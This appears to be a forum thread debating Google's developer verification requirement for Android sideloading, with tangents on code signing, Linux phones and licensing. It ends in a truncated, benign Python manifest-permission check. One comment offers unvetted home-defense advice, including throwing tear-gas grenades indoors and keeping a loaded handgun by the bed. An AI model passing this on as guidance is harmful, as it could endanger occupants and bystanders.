It's also super nice to take notes on the fly for OpenStreetMap with StreetComplete, for holding the device up to the sky and it tells you what planet is so bright in the sky, for navigation... These things don't work on a laptop. Even if you want to carry a full-sized system in place of a smartphone, or use Ubuntu Touch, I'm not aware of software to do these things in the convenient way that Android apps let you
Of course, that's a software support issue and not a constraint imposed by the OS. Someone could make Stellarium desktop work with an orientation sensor. It's just that nobody has done that particular thing, as well as a million other things that work super well on mobile
So is it second-class, or is it just a way that is optimised for output rather than input? You get the turn instructions presented to you, you can watch videos and listen to music, note-taking is optimised to work with a few taps and is reduced to the essentials you need. You can work them out later on computer if you have time at home over of course, but at least you can contribute that way with ease
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
I too miss Palm. I had a Pilot, then a Treo, and finally a Pixie. When HP bought Palm, I switched to iPhone. It was a sad day.
I cut my teeth on commercial b2c & b2b app dev/sales on Palm OS from the age of 14. It was sad but now I'm a full-time bootstrapped iOS dev thanks to that experience.
Windows 10 Mobile was good.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
The developer experience was trash.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want to do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
It's incredible that by the end of it, the WM rollercoaster made us actually miss WinCE. If you had told us that initially, none of us would have believed you. WM had so much potential and was just totally botched.
I make a point of never installing an app when there's a usable mobile site. Even if they prompt me to install every ten seconds.
Every time Reddit asks me if I want to open it up in their app, I want to do that even less.
please don't take it out on us mobile devs
Heh, I've always done this. Maybe if every mobile dev made sure I could find text like I can in a browser I'd be less strident. But really, I need a very good reason to install stuff.
Some Linux phones exist. And there is sailfishOS too.
I mean, just get a rootable phone and roll your own ROM. If you can type stuff in a terminal, it's not that hard to do.
You can pretty much disable all google services. Just a fair warning though, the experience is quite degraded.
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
https://learn.microsoft.com/en-us/windows/apps/develop/smart...
Code signing by a pseudonymous key is different than a requirement to cede personal data to a central registry
It requires a code signing certificate from one of the trusted central authorities, and generally as an individual you must have your legal name on the code signing certificate. It's not pseudonymous.
Code signing is somewhat OK as I can get a code signing cert using a provider in my country that I can go to physically and show their employee my ID.
If Google does that then it’s not the worst.
Worst is having to get my ID and all details scanned and processed by Google.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
They greatly improved the situation over the past couple years. Azure Trusted Signing is only $10/month and provides cloud-based signing.
It's a huge pain to set up initially, but it's smooth sailing after that. There's a good tutorial at https://melatonin.dev/blog/code-signing-on-windows-with-azur...
The setup is the most insane stupid stuff I've dealt with in a while. I am currently waiting for them to agree that my DUNS number is real, and they made me remove the WHOIS privacy from my domain name to verify that my address is associated with it. The billing receipts from my host were insufficient for reasons they couldn't explain. Had to upgrade to the $30/mo and then the $100/mo support plan just to speak to someone and it's been 4 weeks without movement. But hopefully it will be worth it in the end, the EV certs are crazy expensive and don't even remove smartscreen warnings anymore.
Ugh, sorry to hear that, yeah the whole setup process is just so insanely frustrating. I'm really dreading having to re-validate my identity documents once they expire.
For what it's worth, in my experience it was even worse with EV certs though - all the same steps including removing WHOIS privacy, plus some extra ones like voice phone number validation that had to be repeated every single year.
And then there were extra WTFs with the EV cert expiration being 365 days after an issue date which is several days before you actually receive the hardware token. Or one year they sent the hardware token fairly promptly, but forgot to send the password needed to use it, and it took a week to get a response from support etc. Then again, Azure Trusted Signing has similar ridiculousness with billing being based on calendar months, with no proration for your first month even if you started at the end of the month... I mean it's just $10 but it really adds insult to injury after that signup gauntlet.
Anyway, I've heard that if your Azure Trusted Signing process gets stuck in limbo, it can be best to submit a different document, but I'm not sure if there's any alternative permitted for the DUNS step. That's especially annoying because trying to update outdated info with Dun & Bradstreet is problematic in my experience, i.e. their web forms just plain did not function properly.
Yeah I was with Comodo before and it's like you said. I thought Azure signing was going to be a breeze because I've had my Azure account for years. I submitted with both EIN and DUNS and then they said I can't submit any more validation requests for this "property", so that's why I went the $100/mo support plan to get a human somewhere to click a button and approve this thing.
Only available to US and Canadian businesses who have more than 3 years of tax history. Weird limitation.
Nice, thanks, I'll take another look!
When people say just use Linux I can only think of what was known as far back as 2014.
> NSA: Linux Journal is an "extremist forum" and its readers get flagged for extra surveillance [0]
Looks like this is a part of the move toward Chat Control and ending E2E encryption.
[0] https://www.linuxjournal.com/content/nsa-linux-journal-extre...
They saw Apple getting away with notarization under the DMA so they're doing the same. I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Yep. I feel powerless, and I don't know what to do. I don't think there is anything I can do, except for watch all of technology get locked down to the point that you need a monopolist's or a government's permission before you do anything with it.
It's so fundamentally depressing, and completely at odds with how I grew up viewing tech.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
[1] https://classic.austlii.edu.au/au/legis/nsw/consol_act/ca190...
[2] https://grapheneos.org/features#duress
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include-- (a) a device if-- (i) the device has been designed, modified or equipped with software or security features, and (ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
I doubt a judge would interpret the law that way.
I mean, in my country, it's increasingly unclear to me whether things like "loudly criticizing the executive branch" are now considered criminal. Recent executive branch statements on this issue seem to indicate that they may consider some critics criminal just for being critics. But it's hard to be sure. And so far, every critic they've threatened to arrest has also been accused of committing other crimes.
So "the government only considers a duress PIN illegal if it is used to facilitate crime" seems like a potentially tricky standard to apply.
I love how this statement could apply to so many different countries right now!
> depending on what a reasonable person thinks
But this is just legal fiction, so not a barrier to "automatic"
At the pace of regulations we have, one day everything will be forbidden and we will all be criminals just for protecting our own wealth or security from these... yes, from these mafias.
And we will all rationalise it and believe it's normal and has always been like that.
Sad but true for so many people.
I could use a knife to chop meat, not people; I could use a car to commute, not as a high speed bullet; I could use a gun to eliminate pests, not to kill people. Just because I can use something to do something nefarious doesn't mean it should be banned, or we should not use the Internet at all because it facilitates scammers.
It is always the human mind that dictates the action, not the tool. It is futile to try and ban the tool, and I bet 100% they knew that.
This is uncanny and worryingly specific, and I'm not a lawyer, but if you're not already under suspicion of being a criminal, then installing graphene doesn't match this definition I think
"This regulation will only apply to people who are already criminals" is a line that has never held
Suspect, they wrote, and that happens all the time. If you go into a store on the way home from work, and 99 days this works fine but the 100th day they want to look in your bag, but you can't show them confidential drawings of the Google Pixel 14 Max that you carry as part of your work, now they'll think you really did steal something and you went from no suspicion (spot check) to definitely a suspect and new things start to apply to you, e.g. if you leave without resolving the suspicion the police might have grounds to enter your house or search you when you walk out next time. The suspicion is based on being a suspect, not on any actual evidence (nobody saw you put anything in your bag)
I mean, you don't really have to speculate about what this is for, it's for an authority providing for lawful search, it seems pretty well-scoped, and similar to any old search warrant, which is not a new thing, really https://classic.austlii.edu.au/au/legis/nsw/consol_act/deccd...
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSW's implementation seems OK I guess
We have mass surveillance already in all 5 eyes countries that assumes that anyone can be a criminal at all times.
Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all. They understand that as well.
They tried to pull a similar move with WinRT/UWP, but nobody wanted it, so now you can continue with Win32.
They would love to do so, but legacy compatibility is a major business advantage.
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
That's funny because I don't presume anything on the Windows store has integrity and feel safer downloading the MSI from the official source.
this is literally just an xbox lol
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
Was it? WOW64 runs 32-bit software fine enough. Or are you talking about 16-bit applications?
MS is now competing against businesses that see their users as profit centers. (Google, Meta, Apple)
Windows was never going to go another way than this.
Users who care about hardware and/or software freedom should be on linux.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
Microsoft basically already has this (and has for the last ~20 years) as SmartScreen.
When was the last time you opened your start menu?
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
Granny can get scammed using Anydesk, available on Google Play.
Imagine that metaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
What a lovely granny that totally exists.
I suspect it's not grandma getting scammed by APKs, but people installing cracked versions of spotify/youtube/paid games.
> cracked versions of spotify/youtube/paid games
This doesn't make much sense to me.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
They mean apps like SmartTube, Vanced, Instander, Spotify Premium Mod which block ads or grant other premium features for free.
You are approaching this as if the malicious developer was trying to add useful features for the users.
But in practice, these “apps that look like popular apps” are not intended to just be adware-less versions of the popular apps. They are frequently “hide the ads, inject the malware with more permissions” Trojan horses.
I think there is likely a dual motive from Google where they both want to stop malware _and_ stop people blocking youtube ads. The malware problem is real though.
no, cracked as in the ad-free premium versions, without paying for them
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which of your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
My mother in law is constantly worried by some Google Ads in random apps that her phone is hacked...
Did she ever get anything side loaded like that? I have downloaded malware by mistake before. Not once were they allowed to proceed with installation. The only way I got anything side loaded was if I installed the first one (which is always Fdroid) deliberately via ADB after I enabled the developer mode.
This is the year of Linux on the Desktop!
I think the first thing Windows loses dominance in is Gaming, and that will be the beginning of the end.
Are there still people who like using Windows?
> Are there still people who like using Windows?
You are assuming that everyone knows about or ever experienced the alternatives. Windows way is the only way for many.
Linux is at 5% desktop market share this year, and I gave up on running windows games without steam a decade ago.
On average my game library works much better under Linux than Windows (Mac is a distant third — probably worse than FreeBSD).
Anyway, at 1 in 20, most people probably know someone that runs Linux.
No I'm not. I asked if anyone likes Windows. These people presumably have no opinion, it's just a means to an end. The closest thing I think you'll get is "I liked Windows 7" or something like that.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
“western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care”
Wow, how fix (WITHOUT intelligence tests as voting requirement) :(
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
I would say it’s really 50% platform control, 50% government regulation.
Malware is the excuse. I went, without super skill, 40 years while only contracting two viruses ever (one was Kakworm, the other was inert at the time because I was an Amiga user who kept a copy of Scorched Earth on a floppy, which never infected my Amiga).
This would also mean eliminating WSL2.
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerable driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely on things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
I just want to say:
I am so sick of Google.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
Sincerely.
> I hope the DOJ/FTC split Google into a dozen companies.
There's no chance of that under the current regime. It loves bribery and Google has the money to get whatever they want.
It is so weird to read comments based on a belief that the current government is aimed at some goal of justice. I guess they're just still drinking the Kool-aid?
Trump was a breath of fresh air talking about frustrations with the status quo that other politicians wouldn't acknowledge. But the only reason he was bringing them up was for use as a cudgel to shake down companies to enrich himself. He will very most certainly go after big tech monopolies and break them up... iff those big tech monopolies don't put bribes into his pocket. As long as his pockets get fatter, then the status quo is just peachy. It's called "making a deal".
control=surveillance
control is the entire point of the surveillance
This whole thing is getting totally out of surveillance!
Someone should hit surveillance-alt-delete!
government unregulation
It's still government regulation. It's just that they have changed the target or regulation from commercial entities to regular individuals like you.
When was the last time there was some actually good news in big tech? For those that don't hold stocks I mean.
> When was the last time there was some actually good news in big tech?
The issue is that the good news is often incremental, while the bad news comes in large steps, which makes it much more noticeable.
Last week. The bags I’m holding for Intel got a little lighter. Lmao.
Nana is still not happy
We're in the era of less control, more surveillance, more "security", more being treated like a child and lied to.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
"Just yesterday, an app that directly impacts my money, asked me to make it more secure" - how did you survive?
Venmo doesn't get your bio data, it just gets a true or false from the OS.
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
So people from countries US has sanctioned can't even develop and use mobile apps anymore. This will change millions of innocent lives. So unfair and racist. The reason my people are in this mess in the first place is a US coup.
Agreed!
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't be surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing.
> developers will have the same freedom to distribute their apps directly to users
You have here Google making a statement it can't actually fulfill and one that it knows it can't fulfill. So Google is willfully lying here.
The minute Google has a technical capability to control what applications run on Android it's out of their hands. It is in the hands of courts, governments, dictators and authoritarians. That's just the nature of the world - Google has to obey the law and Google doesn't make the laws.
I guess it sounds hysterical, but in that sense, this is an absolutely massive loss of freedom for the entire planet as communication power that rested with individual choice is now transferred wholesale back to governments by this decision.
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillance cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in an easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
Or just don't give your home address to Google.
Who doesn't like idea of throwing grenades down their hallway??
What do you mean by "Google posted my name and address"? How? Why?
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
https://support.google.com/googleplay/android-developer/thre...
That's absolutely correct.
That's why you have to have a business address, and get all your business admin ducks in a row, even if it's your first real monetized app. Your future self will always thank you!
I cannot resist the urge to point out that we wouldn't have had this problem if people had actually stuck to free software instead of "commercial use friendly" open source licensing.
You are 100% correct.
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
Sure, but just the regular GPLv3 would have been good enough to prevent this particular abuse.
That's fair, but a more pervasive Free Software ecosystem might have possibly avoided this outcome entirely. And that failure is something we can lay directly at the feet of the FSF.
If RMS was going to piss off the entire industry with a new version of the GPL, the least he could do was close the network hole. What we got instead is a half measure that satisfies nobody.
More importantly, he completely missed the boat on App Stores. Why was there never any watered down version of copyleft that could be used as a wedge to try and pry open app stores over time? They did it for libraries with the LGPL, but apparently app stores weren't worth special casing.
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
source: https://en.m.wikipedia.org/wiki/Toybox
Free choice in the market is a lie anyhow. You are limited by what has actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to do what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
Except Android is based on Linux.
This is crazy. I can't install my own apps on my own phone anymore.
I am gonna start carrying around a laptop with a 5G modem instead.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all its various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost as a species.
I wonder if you could keep your "snitch" android phone home by instrumentalizing it, enabling you to access it remotely on your main linux/degoogled android phone. It might not even be that outrageous of an idea since there are tons of botfarms that are essentially stacks and stacks of legit phones being remotely controlled... the tech might be there already, just need to adapt it for something good...
https://github.com/Genymobile/scrcpy
How likely is it for google to deny access to all or most of the apis that makes this possible? Then you need to point a camera to the screen, mike the speakers and so on...
If you asked me yesterday if Google would ever block sideloading, I would have said no.
All bets are off at this point.
I'm curious why you need a phone for banking at all, at home as you say. Wouldn't a laptop suffice? Granted, not all banks have a web app these days
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
ding ding ding a second phone is the correct answer
Don't worry, they'll stop letting you access your bank without an app soon enough. Gotta protect the children and what-not.
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
Time to switch banks.
That's indeed what I'm planning to do but I'll buy a Steam Deck
I have been looking into this as well. There are a few devices from GPD Win that are smaller than the Steam Deck but also have a physical keyboard.
I don't blame Google. Apple escaped anti-trust by simply not allowing anyone except themselves to put software on iPhones. Seriously, Apple doesn't allow competitors so it can't be anti-competitive according to the case.
Totally brain damaged ruling, the judge must have been molested by an Android phone at some point, but here we are, and google is now moving closer to an Apple model.
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to do even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The user gets the phone and it just works, from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to link someone to the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
There has to be a threshold where enshittification has been pushed so far that nerd software becomes the thing cool kids boast about running.
Where a less restricted device can do cool things nobody else can do.
A linux-based phone... with an 18650 battery slot... with a keyboard... and a meshtastic radio... drool.
Phones are hard because of certification requirements.
PDAs, now... have a look at https://www.clockworkpi.com/home-uconsole
There's an Android app called GPSLogger.[1] It does exactly what it says on the tin. Runners use it to track their own progress. Photographers use it to geotag their own photos.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
[1]: https://gpslogger.app/
[2]: https://github.com/mendhak/gpslogger/issues/849
The attempts to roll out digital ID are similar to the perennial efforts to backdoor encryption. When one push fails, the proponents regroup and formulate a new approach. The recent successes with "age verification" have encouraged digital ID proponents. Expect further encroachments, scaremongering and trial balloons.
Natural incentives exist for tech majors to capture this space.
This is completely, absolutely and totally unacceptable.
My phone is my phone, not Google’s. They have absolutely no right to prevent me from running whatever software I wish on that phone.
This must not be allowed to stand.
You paid for the phone with the OS as a contributing factor (alongside the hardware) to the purchase no doubt, so the OS in itself must be compelling to you for some reason.
You didn't fund the development of the OS, contribute to it (presumably), you didn't market it or position it alongside your brand.
I'd agree with you if you said you have a right to run anything on the hardware under a different OS, but you have no god given right to run whatever you want on the OS.
Looking at what's been going on in the E.U. vs. the U.S., it seems pretty clear that one of the only things companies this big, with this much control over the markets fear is regulation.
Maybe people live in a country where adding new regulations is difficult at the moment. In that case, push for it at the state or province level. Push for it wherever you can. Suddenly these companies have to figure out how to work around 50 different state level laws? Painful. Good. Make it hurt to be evil.
People need to come together and push for regulatory roadblocks to things like this at every level. I think that's part of how you keep control of your own property and stand up against it.
It's actually your telco's phone. They're the one that has the license to run the baseband computer and RF transceiver. The 'pad' computer device is sort of yours. But there's no legal way to have ownership of a cell phone unless you yourself bid for and get the RF spectrum and set up your network in a way that accomplishes the FCC coverage and timing requirements. Then run your own telco for your phone. Basically, impossible.
Smart phones try to limit and firewall the interface between the two but tight integration is required for energy efficiency. So a smart phone, or a cell phone, can never be yours. They aren't good choices for doing computing and this legal reality is becoming more and more obvious with time.
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
That's exactly the goal
A few years from now: After reviewing the usage of the approved sideloading feature, we discovered no more than 0.01% of users ever sideload an application. For security, sideloading is now disabled on all devices forever.
Is that after the top execs join the US Army? [0]
0: https://news.ycombinator.com/item?id=44330155
So what are our options (eg for EU citizens) for lobbying in terms of legislation or directly to Google to show disagreement with this?
It looks like many in this thread are against, but I don't see suggestions for action?
We need to lobby for choice at every stage. You must be able to choose which network, which phone, which OS, which app stores, which apps.
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
The issue with that 2nd solution is, "purchasing a phone with GrapheneOS" only registers from Google's perspective as "we just sold an additional Pixel, so we're doing good right now"
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
"To combat malware and financial scams"
What a horrible, terrible, depressing bag of lies that the anti-humanists keep getting away with saying with a straight face.
I really need the more open Linux tablet and phone makers to hurry up.
In fact, they need you to survive.
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen. Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
[0]: https://liberapay.com/dos
[1]: https://honk.sigxcpu.org/piki/donations
Looks like Google will also be limiting each developer's number of apps and installations unless you pay them $25. https://developer.android.com/developer-verification/guides/...
That's what it has always cost.
Yes, it's the same price as a Google Play Console developer account, but this is for access to the new Android Developer Console.
Great news which hopefully will shape the buyer away from monopolies.
Every time I read news like this I lose more hope for our world to not end up a Cyberpunk Dystopia. Like what am I supposed to do. I am just one man. One vote, one guy who isn't even too good at coding.
This must be because of Epic's win in antitrust court.
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
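A sketch of the manifest check proposed in the comment above, added here as an example and not part of the thread or of any existing store client. It assumes the intended policy is "request nothing beyond an allowlist" and that the manifest has already been decoded to text XML (for example with apktool), since the copy inside an APK is binary AXML; the sample manifests are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS
# Both elements request a permission; the second applies on API 23+.
PERMISSION_TAGS = ("uses-permission", "uses-permission-sdk-23")
# First four bytes of a compiled (binary) AndroidManifest.xml.
AXML_MAGIC = b"\x03\x00\x08\x00"
# Assumed policy: network access and nothing else.
ALLOWED = frozenset({"android.permission.INTERNET"})


class ManifestRejected(Exception):
    """The manifest could not be trusted enough to evaluate."""


def requested_permissions(manifest):
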